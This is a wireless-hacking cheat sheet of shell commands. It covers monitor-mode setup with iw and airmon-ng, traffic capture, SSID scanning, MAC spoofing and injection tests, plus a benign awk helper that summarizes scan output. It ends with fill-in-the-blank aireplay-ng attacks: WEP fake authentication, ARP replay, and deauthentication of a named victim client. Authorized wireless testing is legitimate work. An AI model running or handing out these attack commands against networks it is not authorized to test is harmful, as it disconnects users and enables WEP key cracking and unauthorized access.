native
# create new interface in monitor mode
sudo iw dev wlan0 interface add mon0 type monitor
# bring up the new interface
sudo ifconfig mon0 up
# check interface status
iwconfig mon0
# verify traffic with tcpdump
sudo tcpdump -i mon0 -s 65000 -p
# delete new interface
sudo iw dev mon0 interface del
# confirm that interface is gone
iwconfig mon0
airmon-ng start/stop interface in monitor mode
airmon-ng start wlan0
airmon-ng stop [phy0]wlan0mon
Check SSIDs and channels
iw dev wlan0 scan | egrep "DS\ Parameter\ set|SSID"
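The egrep above prints the SSID and channel on separate lines; the helper below (an added example, not part of the original cheat sheet) pairs each BSSID with its channel and SSID. The scan text embedded in it is constructed sample `iw` output so the script runs offline; the interface name wlan0 is assumed.

```shell
#!/bin/sh
# Added example: summarize `iw dev <iface> scan` output as one line per BSS.
# Constructed sample scan output (not captured from a real network):
SAMPLE_SCAN='BSS aa:bb:cc:dd:ee:01(on wlan0)
	signal: -45.00 dBm
	SSID: HomeNet
	DS Parameter set: channel 6
BSS aa:bb:cc:dd:ee:02(on wlan0)
	signal: -70.00 dBm
	SSID: Guest
	DS Parameter set: channel 11
BSS aa:bb:cc:dd:ee:03(on wlan0)
	signal: -80.00 dBm
	SSID:
	DS Parameter set: channel 1'

# summarize_scan: read iw scan output on stdin and print
# "BSSID<TAB>channel<TAB>SSID" for every BSS block seen.
# An empty SSID (hidden network) is reported as <hidden>;
# a BSS without a DS Parameter set line gets "?" as channel.
summarize_scan() {
    awk '
        function flush() {
            if (bssid != "") printf "%s\t%s\t%s\n", bssid, chan, ssid
        }
        /^BSS / {
            flush()
            bssid = $2; sub(/\(.*/, "", bssid)   # strip "(on wlan0)"
            ssid = "<hidden>"; chan = "?"
        }
        /^[ \t]*SSID:/ {
            s = $0; sub(/^[ \t]*SSID: ?/, "", s)   # keep SSIDs with spaces
            if (s != "") ssid = s
        }
        /^[ \t]*DS Parameter set: channel / { chan = $NF }
        END { flush() }
    '
}

# Live use (interface must exist, normally needs root):
#   sudo iw dev wlan0 scan | summarize_scan
printf '%s\n' "$SAMPLE_SCAN" | summarize_scan
```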
get/change mac address
macchanger -s wlan0mon
Test if wireless card supports packet injection
aireplay-ng -9 wlan0mon
Two card injection test
aireplay-ng -9 -i wlan1 wlan0mon
fake authentication attack (WEP)
- this attack does not generate ARP packets
aireplay-ng -1 0 -e <ESSID> -a <MACADDROFACCESSPT> -h <MYMACADDR> wlan0mon
arp request replay attack
aireplay-ng -3 -b <MACADDROFACCESSPT> -h <MYMACADDR or VICTIMMACADDR> wlan0mon
deauthentication attack
aireplay-ng -0 1 -a <MACADDROFACCESSPT> -c <MACADDROFVICTIM> wlan0mon